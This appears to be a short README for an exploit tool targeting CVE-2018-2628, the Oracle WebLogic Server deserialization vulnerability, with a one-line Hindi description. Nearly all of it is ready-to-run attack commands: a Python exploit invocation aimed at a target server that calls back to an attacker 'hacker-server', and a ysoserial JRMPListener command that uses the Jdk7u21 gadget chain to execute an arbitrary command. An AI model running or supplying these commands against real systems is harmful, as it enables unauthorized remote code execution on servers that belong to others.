
CVE-2018-2628 के लिए शोषण जो Oracle WebLogic Server डिसेरियलाइज़ेशन भेद्यता को लक्षित करता है, ysoserial JRMP लिसनर के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है।
weblogic-cve-2018-2628-exp
python2 weblogic-cve-2018-2628-exp.py [targetip targetport] ysoserial-0.1-cve-2018-2628-all.jar [bindip bindport] JRMPClient
python weblogic-cve-2018-2628-exp.py [weblogic-server] 7001 ysoserial-0.1-cve-2018-2628-all.jar [hacker-server] 2333 JRMPClient
java -cp [toolname] ysoserial.exploit.JRMPListener [bindport] [jdkversion] [command]
java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 2333 Jdk7u21 "calc.exe"